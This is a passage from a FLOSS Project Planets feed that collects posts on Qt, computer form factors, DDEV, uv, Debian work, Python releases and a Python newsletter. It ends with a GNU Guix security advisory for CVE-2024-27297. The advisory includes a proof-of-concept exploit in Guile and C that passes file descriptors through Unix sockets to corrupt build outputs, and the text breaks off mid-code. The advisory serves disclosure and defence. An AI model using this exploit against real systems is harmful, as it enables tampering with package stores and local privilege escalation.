FLOSS Project Planets

Qt for MCUs 2.7 released

Planet KDE - Wed, 2024-03-13 09:20

A new version of Qt for MCUs is available, bringing new features to the Qt Quick Ultralite engine, additional microcontrollers, and various improvements to our GUI framework for resource-constrained embedded systems.

Categories: FLOSS Project Planets

Russell Coker: The Shape of Computers

Planet Debian - Wed, 2024-03-13 08:16
Introduction

There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to.

This means that further development in the size and shape of computers will largely be determined by human factors.

I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.

Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.

Desktop/Laptop PCs

When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the Raspberry Pi 400 [1] which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a “add a screen to make a laptop” as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.

The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.

The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment text editing with a touch screen is an unsolved problem in computer science [2].

The Lenovo Thinkpad X1 Fold [3] and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US.

I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don’t work well for small devices and touch devices and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.

We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn’t take off largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.

The Interesting New Things Watch Like

The wrist-watch [4] has been a standard format for easy access to data when on the go since it’s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as “pocket watches” for about 10 years.

The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the calculator watch [5] which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?

Phone Like

Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). Phones and tablets with multiple folds are coming out now [6]. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. I’ve previously written about Convergence between phones and desktop computers [7], the increased capabilities of phones adds to the case for Convergence.

Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them), it will be interesting to see how that goes.

Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that’s enough for a lot of phone functionality.

The Rabbit R1 [8] and the Humane AI Pin [9] have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.

Laptop Like

One interesting PC variant I just discovered is the Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.

The recent release of the Apple Vision Pro [11] has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about the possibility of using augmented reality technology for providing a desktop computing environment [12]. I wonder how a Vision Pro would work for that on a train or passenger jet.

Another interesting thing that’s on offer is a laptop with 7″ touch screen beside the keyboard [13]. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.

Useful Hardware for Developing These Things

I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14], and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap.

The PineTime is a nice smart watch from Pine64 which is designed to be open [15]. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the Raspberry Pi Watch [16] is interesting too.

The PinePhonePro is an OK phone made to open standards but it’s hardware isn’t as good as Android phones released in the same year [17]. I’ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18], but it’s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day.

Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well.

What We Must Do

Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it’s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn’t get it going.

To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.

Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done – even today’s hardware of connecting a small laptop to an external monitor doesn’t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven’t investigated this properly yet, it definitely doesn’t work in an expected manner in Ubuntu 22.04 and I haven’t yet tested the combinations on Debian/Unstable.

ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.

Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it’s own special apps it’s not usable in a “I want to run applications that use any files from any other applicationsin any way I want” sense. My post about Sandboxing Phone apps is relevant for people who are interested in this [19]. We also need to extend security models to cope with things like “ok google” type functionality which has the potential to be a bug and the emerging class of LLM based attacks.

I will write more posts about these thing.

Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.

Related posts:

  1. My Ideal Mobile Phone Based on my experience testing the IBM Seer software on...
  2. Do Desktop Computers Make Sense? Laptop vs Desktop Price Currently the smaller and cheaper USB-C...
  3. Mobile Phones Are Computers One thing I noticed when I got my new LG...
Categories: FLOSS Project Planets

Tag1 Consulting: The DDEV Local Development Environment: Talking with Maintainer Randy Fay

Planet Drupal - Wed, 2024-03-13 07:40

Randy Fay, the maintainer of DDEV discusses the key features and functionalities of DDEV, a Docker-based development environment that streamlines setting up and managing local development for applications (no Docker knowledge is required). Whether you're creating applications in Python, PHP, or other languages, DDEV will save you tremendous time and effort. It also works great for managing multiple projects, or working with a large distributed team, ensuring everyone’s configurations remain in sync. Randy also demos DDEV, showcasing how fast and easy it is to set up a local Drupal development environment quickly. Additionally, he touches upon the history and future of DDEV, and the critical role of the DDEV user community in both supporting the project and shaping it’s development. This interview is perfect for any developer interested in efficient development tools, current DDEV users, or anyone curious about local development technologies and best practices. --- For a transcript of this video, see The DDEV Local Development Environment- Talking with Randy Fay --- ## Links - DDEV: ddev.com - Docs https://ddev.readthedocs.io - CMS Quickstarts https://ddev.readthedocs.io/en/stable/users/quickstart/ - DDEV 2023 Review https://ddev.com/blog/2023-review - [DDEV 2024 Plans](https://ddev.com/blog/2024-plans...

Read more michaelemeyers Wed, 03/13/2024 - 04:40
Categories: FLOSS Project Planets

Talk Python to Me: #453: uv - The Next Evolution in Python Packages?

Planet Python - Wed, 2024-03-13 04:00
Have you ever been wait around for pip to do its thing while installing packages or syncing a virtual environment or through some higher level tool such as pip-tools? Then you'll be very excited to hear about the tool just announced from Astral called uv. It's like pip, but 100x faster. Charlie Marsh from Ruff fame and founder of Astral is here to dive in. Let's go.<br/> <br/> <strong>Episode sponsors</strong><br/> <br/> <a href='https://talkpython.fm/neo4j-notes'>Neo4j</a><br> <a href='https://talkpython.fm/training'>Talk Python Courses</a><br/> <br/> <strong>Links from the show</strong><br/> <br/> <div><b>Charlie Marsh on Twitter</b>: <a href="https://twitter.com/charliermarsh" target="_blank" rel="noopener">@charliermarsh</a><br/> <b>Charlie Marsh on Mastodon</b>: <a href="https://hachyderm.io/@charliermarsh" target="_blank" rel="noopener">@charliermarsh</a><br/> <b>Astral</b>: <a href="https://astral.sh" target="_blank" rel="noopener">astral.sh</a><br/> <b>uv</b>: <a href="https://github.com/astral-sh/uv" target="_blank" rel="noopener">github.com</a><br/> <b>Ruff</b>: <a href="https://github.com/astral-sh/ruff" target="_blank" rel="noopener">github.com</a><br/> <b>Ruff Rules</b>: <a href="https://docs.astral.sh/ruff/rules/" target="_blank" rel="noopener">docs.astral.sh</a><br/> <b>When "Everything" Becomes Too Much: The npm Package Chaos of 2024</b>: <a href="https://socket.dev/blog/when-everything-becomes-too-much" target="_blank" rel="noopener">socket.dev</a><br/> <br/> <b>Talk Python's free Audio AI Course</b>: <a href="https://training.talkpython.fm/courses/build-an-audio-ai-app-with-python-and-assemblyai?ref=talkpython" target="_blank" rel="noopener">training.talkpython.fm</a><br/> <b>Watch this episode on YouTube</b>: <a href="https://www.youtube.com/watch?v=g5RWwvzfs0I" target="_blank" rel="noopener">youtube.com</a><br/> <b>Episode transcripts</b>: <a href="https://talkpython.fm/episodes/transcript/453/uv-the-next-evolution-in-python-packages" target="_blank" rel="noopener">talkpython.fm</a><br/> <br/> <b>--- Stay in touch with us ---</b><br/> <b>Subscribe to us on YouTube</b>: <a href="https://talkpython.fm/youtube" target="_blank" rel="noopener">youtube.com</a><br/> <b>Follow Talk Python on Mastodon</b>: <a href="https://fosstodon.org/web/@talkpython" target="_blank" rel="noopener"><i class="fa-brands fa-mastodon"></i>talkpython</a><br/> <b>Follow Michael on Mastodon</b>: <a href="https://fosstodon.org/web/@mkennedy" target="_blank" rel="noopener"><i class="fa-brands fa-mastodon"></i>mkennedy</a><br/></div>
Categories: FLOSS Project Planets

Talking Drupal: Skills Upgrade 2

Planet Drupal - Wed, 2024-03-13 00:00

Welcome back to “Skills Upgrade” a Talking Drupal mini-series following the journey of a D7 developer learning D10. This is episode 2.

Topics
  • Review Chad's goals for the previous week
    • DDEV Installation
    • Docker for Mac vs other options
    • IDE Setup
  • Review Chad's questions
  • Tasks for the upcoming week
    • DDEV improve performance
    • Install Drupal 10
    • Install drupal/core dependencies
    • Configure and test phpcs
    • Test phpstan
    • Set up settings.local.php
    • Install devel module
Resources

DDEV Performance DDEV Quickstart Drupal Core Dependencies How to Implement Drupal Code Standards Running PHPStan On Drupal Custom Modules Why you should care about using settings.local.php Rancher Desktop

Chad's Drupal 10 Learning Curriclum & Journal Chad's Drupal 10 Learning Notes

Hosts

AmyJune Hineline - @volkswagenchick

Guests

Chad Hester - chadkhester.com @chadkhest Mike Anello - DrupalEasy.com @ultimike

Categories: FLOSS Project Planets

Freexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)

Planet Debian - Tue, 2024-03-12 20:00

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

/usr-move, by Helmut Grohne

Much of the work was spent on handling interaction with time time64 transition and sending patches for mitigating fallout. The set of packages relevant to debootstrap is mostly converted and the patches for glibc and base-files have been refined due to feedback from the upload to Ubuntu noble. Beyond this, he sent patches for all remaining packages that cannot move their files with dh-sequence-movetousr and packages using dpkg-divert in ways that dumat would not recognize.

Upcoming improvements to Salsa CI, by Santiago Ruano Rincón

Last month, Santiago Ruano Rincón started the work on integrating sbuild into the Salsa CI pipeline. Initially, Santiago used sbuild with the unshare chroot mode. However, after discussion with josch, jochensp and helmut (thanks to them!), it turns out that the unshare mode is not the most suitable for the pipeline, since the level of isolation it provides is not needed, and some test suites would fail (eg: krb5). Additionally, one of the requirements of the build job is the use of ccache, since it is needed by some C/C++ large projects to reduce the compilation time. In the preliminary work with unshare last month, it was not possible to make ccache to work.

Finally, Santiago changed the chroot mode, and now has a couple of POC (cf: 1 and 2) that rely on the schroot and sudo, respectively. And the good news is that ccache is successfully used by sbuild with schroot!

The image here comes from an example of building grep. At the end of the build, ccache -s shows the statistics of the cache that it used, and so a little more than half of the calls of that job were cacheable. The most important pieces are in place to finish the integration of sbuild into the pipeline.

Other than that, Santiago also reviewed the very useful merge request !346, made by IOhannes zmölnig to autodetect the release from debian/changelog. As agreed with IOhannes, Santiago is preparing a merge request to include the release autodetection use case in the very own Salsa CI’s CI.

Packaging simplemonitor, by Carles Pina i Estany

Carles started using simplemonitor in 2017, opened a WNPP bug in 2022 and started packaging simplemonitor dependencies in October 2023. After packaging five direct and indirect dependencies, Carles finally uploaded simplemonitor to unstable in February.

During the packaging of simplemonitor, Carles reported a few issues to upstream. Some of these were to make the simplemonitor package build and run tests reproducibly. A reproducibility issue was reprotest overriding the timezone, which broke simplemonitor’s tests. There have been discussions on resolving this upstream in simplemonitor and in reprotest, too.

Carles also started upgrading or improving some of simplemonitor’s dependencies.

Miscellaneous contributions
  • Stefano Rivera spent some time doing admin on debian.social infrastructure. Including dealing with a spike of abuse on the Jitsi server.
  • Stefano started to prepare a new release of dh-python, including cleaning out a lot of old Python 2.x related code. Thanks to Niels Thykier (outside Freexian) for spear-heading this work.
  • DebConf 24 planning is beginning. Stefano discussed venues and finances with the local team and remotely supported a site-visit by Nattie (outside Freexian).
  • Also in the DebConf 24 context, Santiago took part in discussions and preparations related to the Content Team.
  • A JIT bug was reported against pypy3 in Debian Bookworm. Stefano bisected the upstream history to find the patch (it was already resolved upstream) and released an update to pypy3 in bookworm.
  • Enrico participated in /usr-merge discussions with Helmut.
  • Colin Watson backported a python-channels-redis fix to bookworm, rediscovered while working on debusine.
  • Colin dug into a cluster of celery build failures and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable. celery should be back in testing once the 64-bit time_t migration is out of the way.
  • Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately upstream changed the naming of their release tags, so updating the watch file was a bit demanding. Anyway this version 2.0 is a huge step towards introduction of the new Common Print Dialog Backends.
  • Helmut send patches for 48 cross build failures.
  • Helmut changed debvm to use mkfs.ext4 instead of genext2fs.
  • Helmut sent a debci MR for improving collector robustness.
  • In preparation for DebConf 25, Santiago worked on the Brest Bid.
Categories: FLOSS Project Planets

The Drop Times: The Revolutionary Impact of Gander Automated Performance Testing

Planet Drupal - Tue, 2024-03-12 16:34
Performance is a cornerstone of user experience and operational efficiency in web development. Delve into the genesis, capabilities, and transformative potential of Gander, the automated performance testing framework for Drupal, as elucidated by seasoned contributor Nathaniel Catchpole.
Categories: FLOSS Project Planets

Python Insider: Python 3.13.0 alpha 5 is now available

Planet Python - Tue, 2024-03-12 16:01

 

Python 3.13.0 alpha 5 is now available:

https://www.python.org/downloads/release/python-3130a5/

This is an early developer preview of Python 3.13

Major new features of the 3.13 series, compared to 3.12

Python 3.13 is still in development. This release, 3.13.0a5, is the fifth of six planned alpha releases.

Alpha releases are intended to make it easier to test the current state of new features and bug fixes and to test the release process.

During the alpha phase, features may be added up until the start of the beta phase (2024-05-07) and, if necessary, may be modified or deleted up until the release candidate phase (2024-07-30). Please keep in mind that this is a preview release and its use is not recommended for production environments.

Many new features for Python 3.13 are still being planned and written. Work continues apace on both the work to remove the Global Interpeter Lock , and to improve Python performance. The most notable changes so far:

(Hey, fellow core developer, if a feature you find important is missing from this list, let Thomas know.)

The next pre-release of Python 3.13 will be 3.13.0a6, currently scheduled for 2024-04-09.

 More resources  Enjoy the new releases

Thanks to all of the many volunteers who help make Python Development and these releases possible! Please consider supporting our efforts by volunteering yourself or through organization contributions to the Python Software Foundation.

Regards from wet and chilly Amsterdam,

Your release team,
Thomas Wouters
Ned Deily
Steve Dower
Łukasz Langa
Categories: FLOSS Project Planets

PyCoder’s Weekly: Issue #620 (March 12, 2024)

Planet Python - Tue, 2024-03-12 15:30

#620 – MARCH 12, 2024
View in Browser »

Creating Asynchronous Tasks With Celery and Django

In this video course, you’ll learn how to integrate Celery and Django using Redis as a message broker. You’ll refactor the synchronous email sending functionality of an existing Django app into an asynchronous task that you’ll run with Celery instead.
REAL PYTHON course

Understanding Context Manager and Its Syntactic Sugar

The Context Manager is gets used for all kind of interesting things around blocks of code. This article gives a background about the origins of the context manager, which problem it solves and how to use it.
BJÖRN RICKS • Shared by Björn Ricks

🚀 Sentry Launch Week: Making Debugging Fun

If you’ve ever been curious about Sentry or application performance monitoring, Launch Week is for you. Tune in from March 18-22 to get the scoop on new products, new features, and a bunch of other cool stuff. You can get a sneak peek (and win free swag) if you RSVP. It’s a win-win →
SENTRY sponsor

The Ultimate Guide to Data Wrangling With Python

This comprehensive user guide equips you with the skills required to use Python Polars Data Frames effectively for financial and supply chain data science analytics.
AMIT SHUKLA • Shared by Amit Shukla

GIL Disable Added to Main Branch of Python Project

GITHUB

Django Security Releases Issued: 5.0.3, 4.2.11, and 3.2.25

DJANGO SOFTWARE FOUNDATION

PyCon US 2024 Talk Schedule Announced

PYCON US

Articles & Tutorials Building a Healthy Developer Mindset While Learning Python

How do you get yourself unstuck when facing a programming problem? How do you develop a positive developer mindset while learning Python? This week on the show, Bob Belderbos from Pybites is here to talk about learning Python and building healthy developer habits.
REAL PYTHON podcast

Asyncio Patterns in Python

This post talks about how to go from a slow, synchronous process, to a highly concurrent and lightning fast asyncio process. This article starts from the problem in it’s most basic form and incrementally shows you how to move towards concurrency with Asyncio in Python.
SKYLER LEWIS • Shared by CHernandez

Master Python: 250 Actionable Tips Await You

Elevate your Python skills with our FREE ebook containing 250 Bulletproof Python Tips. Ideal for developers eager to refine their coding prowess with practical, instantly applicable advice. Transform your Python code and join a thriving community of Python enthusiasts today →
PYBITES sponsor

Tag-Based Python CI/CD Pipeline

This article walks you through setting up a CI/CD pipeline using Github Actions for Python projects, that trigger on git tag pushes. It also includes a way of handling CI pipeline errors for any point of failure.
DHRUV AHUJA • Shared by Dhruv Ahuja

Python’s __all__: Packages, Modules, and Wildcard Imports

In this tutorial, you’ll learn about wildcard imports and the __all__ variable in Python. With __all__, you can prepare your packages and modules for wildcard imports, which are a quick way to import everything.
REAL PYTHON

Don’t Mock Machine Learning Models in Unit Tests

How you unit test machine learning code differs from typical software practices and simply using mock often doesn’t cut it. This post covers alternative ways of testing your ML software.
EUGENE YAN

Styling Excel Cells With OpenPyXL and Python

Many Python libraries that deal with Excel only handle data, but OpenPyXL gives you the ability to style your cells in many different ways. Learn how to give your spreadsheets pizazz!
MIKE DRISCOLL

Neat Parallel Output in Python

Max adapts some StackOverflow code to handle multiple output streams in parallel, giving you a quick way to handle the output from concurrent processes at the same time.
MAX BERNSTEIN

Python Deque Tutorial With 7 Example Use Cases

This tutorial teaches the mechanics of the data structure collections.deque, using seven example use cases where deque simplifies the implementation of a function.
RODRIGO GIRÃO SERRÃO • Shared by Rodrigo Girão Serrão

Improving Django Testing With Seed Database

A seed database is one with initial data for your project. They can be useful when testing and in CI/CD pipelines. This article shows you how to create them in Django.
KARL FREDRIK HAUGHLAND

Datetimes With Timezones in Python

The article shows examples of using timezones with datetime objects, using the zoneinfo module added in the standard library in Python 3.9.
MARKKU LEINIÖ • Shared by Markku Leiniö

Speed Up AI Development With Open Source Code Snippets

Save time and resources by building on top of our open-source sample apps. Get a headstart on development and deploy your AI apps faster with Intel’s OpenVINO toolkit.
INTEL CORPORATION sponsor

Python Dependencies Are Fixable

Dependency management can be a hurdle for newcomers to Python, and this article argues that better defaults would be the right answer.
MAT DUGGAN

Generic Functions and Generic Classes in Python

Python does have generics! Learn how to use typing TypeVar and Generic to reuse code with proper typing.
GUI LATROVA • Shared by Gui Latrova

Projects & Code django-simple-menu: Code-Based Menus for Django

GITHUB.COM/JAZZBAND

poltergeist: Rust-Like Error Handling in Python

GITHUB.COM/ALEXANDERMALYGA

whenever: Strict, Predictable, and Typed Datetimes

GITHUB.COM/ARIEBOVENBERG

PyprojectX: Make Reproducible Builds

GITHUB.COM/PYPROJECTX • Shared by Ivo Houbrechts

modguard: Enforce a Decoupled Architecture

GITHUB.COM/NEVER-OVER

Events What’s New in Wagtail CMS Webinar

March 12 to March 13, 2024
WAGTAIL.ORG • Shared by Thibaud Colas

Weekly Real Python Office Hours Q&A (Virtual)

March 13, 2024
REALPYTHON.COM

Python Atlanta

March 14 to March 15, 2024
MEETUP.COM

PyCon SK 2024

March 15 to March 18, 2024
PYCON.SK

Django Girls Eket Workshop

March 15 to March 17, 2024
DJANGOGIRLS.ORG

Chattanooga Python User Group

March 15 to March 16, 2024
MEETUP.COM

Happy Pythoning!
This was PyCoder’s Weekly Issue #620.
View in Browser »

[ Subscribe to 🐍 PyCoder’s Weekly 💌 – Get the best Python news, articles, and tutorials delivered to your inbox once a week >> Click here to learn more ]

Categories: FLOSS Project Planets

Balint Pekker: The Future of Drupal

Planet Drupal - Tue, 2024-03-12 13:56
In the world of Drupal, staying ahead of the curve is essential for building websites that are not just functional but also future-proof. As the digital landscape continues to evolve, it's crucial to explore emerging trends and technologies in Drupal development that are shaping the future. In this blog post, we'll dive into some of these exciting possibilities and discuss how they can lift Drupal websites to new heights.
Categories: FLOSS Project Planets

GNU Guix: Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)

GNU Planet! - Tue, 2024-03-12 11:38

A security issue has been identified in guix-daemon which allows for fixed-output derivations, such as source code tarballs or Git checkouts, to be corrupted by an unprivileged user. This could also lead to local privilege escalation. This was originally reported to Nix but also affects Guix as we share some underlying code from an older version of Nix for the guix-daemon. Readers only interested in making sure their Guix is up to date and no longer affected by this vulnerability can skip down to the "Upgrading" section.

Vulnerability

The basic idea of the attack is to pass file descriptors through Unix sockets to allow another process to modify the derivation contents. This was first reported to Nix by jade and puckipedia with further details and a proof of concept here. Note that the proof of concept is written for Nix and has been adapted for GNU Guix below. This security advisory is registered as CVE-2024-27297 (details are also available at Nix's GitHub security advisory) and rated "moderate" in severity.

A fixed-output derivation is one where the output hash is known in advance. For instance, to produce a source tarball. The GNU Guix build sandbox purposefully excludes network access (for security and to ensure we can control and reproduce the build environment), but a fixed-output derivation does have network access, for instance to download that source tarball. However, as stated, the hash of output must be known in advance, again for security (we know if the file contents would change) and reproducibility (should always have the same output). The guix-daemon handles the build process and writing the output to the store, as a privileged process.

In the build sandbox for a fixed-output derivation, a file descriptor to its contents could be shared with another process via a Unix socket. This other process, outside of the build sandbox, can then modify the contents written to the store, changing them to something malicious or otherwise corrupting the output. While the output hash has already been determined, these changes would mean a fixed-output derivation could have contents written to the store which do not match the expected hash. This could then be used by the user or other packages as well.

Mitigation

This security issue (tracked here for GNU Guix) has been fixed by two commits by Ludovic Courtès. Users should make sure they have updated to this second commit to be protected from this vulnerability. Upgrade instructions are in the following section.

While several possible mitigation strategies were detailed in the original report, the simplest fix is just copy the derivation output somewhere else, deleting the original, before writing to the store. Any file descriptors will no longer point to the contents which get written to the store, so only the guix-daemon should be able to write to the store, as designed. This is what the Nix project used in their own fix. This does add an additional copy/delete for each file, which may add a performance penalty for derivations with many files.

A proof of concept by Ludovic, adapted from the one in the original Nix report, is available at the end of this post. One can run this code with

guix build -f fixed-output-derivation-corruption.scm -M4

This will output whether the current guix-daemon being used is vulnerable or not. If it is vulnerable, the output will include a line similar to

We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!

The corrupted file can be removed with

guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*

In general, corrupt files from the store can be found with

guix gc --verify=contents

which will also include any files corrupted by through this vulnerability. Do note that this command can take a long time to complete as it checks every file under /gnu/store, which likely has many files.

Upgrading

Due to the severity of this security advisory, we strongly recommend all users to upgrade their guix-daemon immediately.

For a Guix System the procedure is just reconfiguring the system after a guix pull, either restarting guix-daemon or rebooting. For example,

guix pull sudo guix system reconfigure /run/current-system/configuration.scm sudo herd restart guix-daemon

where /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.

For Guix running as a package manager on other distributions, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service. For example, on a system using systemd to manage services,

sudo --login guix pull sudo systemctl restart guix-daemon.service

Note that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.

Conclusion

One of the key features and design principles of GNU Guix is to allow unprivileged package management through a secure and reproducible build environment. While every effort is made to protect the user and system from any malicious actors, it is always possible that there are flaws yet to be discovered, as has happened here. In this case, using the ingredients of how file descriptors and Unix sockets work even in the isolated build environment allowed for a security vulnerability with moderate impact.

Our thanks to jade and puckipedia for the original report, and Picnoir for bringing this to the attention of the GNU Guix security team. And a special thanks to Ludovic Courtès for a prompt fix and proof of concept.

Note that there are current efforts to rewrite the guix-daemon in Guile by Christopher Baines. For more information and the latest news on this front, please refer to the recent blog post and this message on the guix-devel mailing list.

Proof of Concept

Below is code to check if a guix-daemon is vulnerable to this exploit. Save this file as fixed-output-derivation-corruption.scm and run following the instructions above, in "Mitigation." Some further details and example output can be found on issue #69728

;; Checking for CVE-2024-27297. ;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>. (use-modules (guix) (guix modules) (guix profiles) (gnu packages) (gnu packages gnupg) (gcrypt hash) ((rnrs bytevectors) #:select (string->utf8))) (define (compiled-c-code name source) (define build-profile (profile (content (specifications->manifest '("gcc-toolchain"))))) (define build (with-extensions (list guile-gcrypt) (with-imported-modules (source-module-closure '((guix build utils) (guix profiles))) #~(begin (use-modules (guix build utils) (guix profiles)) (load-profile #+build-profile) (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output))))) (computed-file name build)) (define sender-source (plain-file "sender.c" " #include <sys/socket.h> #include <sys/un.h> #include <stdlib.h> #include <stddef.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> int main(int argc, char **argv) { setvbuf(stdout, NULL, _IOLBF, 0); int sock = socket(AF_UNIX, SOCK_STREAM, 0); // Set up an abstract domain socket path to connect to. struct sockaddr_un data; data.sun_family = AF_UNIX; data.sun_path[0] = 0; strcpy(data.sun_path + 1, \"dihutenosa\"); // Now try to connect, To ensure we work no matter what order we are // executed in, just busyloop here. int res = -1; while (res < 0) { printf(\"attempting connection...\\n\"); res = connect(sock, (const struct sockaddr *)&data, offsetof(struct sockaddr_un, sun_path) + strlen(\"dihutenosa\") + 1); if (res < 0 && errno != ECONNREFUSED) perror(\"connect\"); if (errno != ECONNREFUSED) break; usleep(500000); } // Write our message header. struct msghdr msg = {0}; msg.msg_control = malloc(128); msg.msg_controllen = 128; // Write an SCM_RIGHTS message containing the output path. struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); hdr->cmsg_len = CMSG_LEN(sizeof(int)); hdr->cmsg_level = SOL_SOCKET; hdr->cmsg_type = SCM_RIGHTS; int 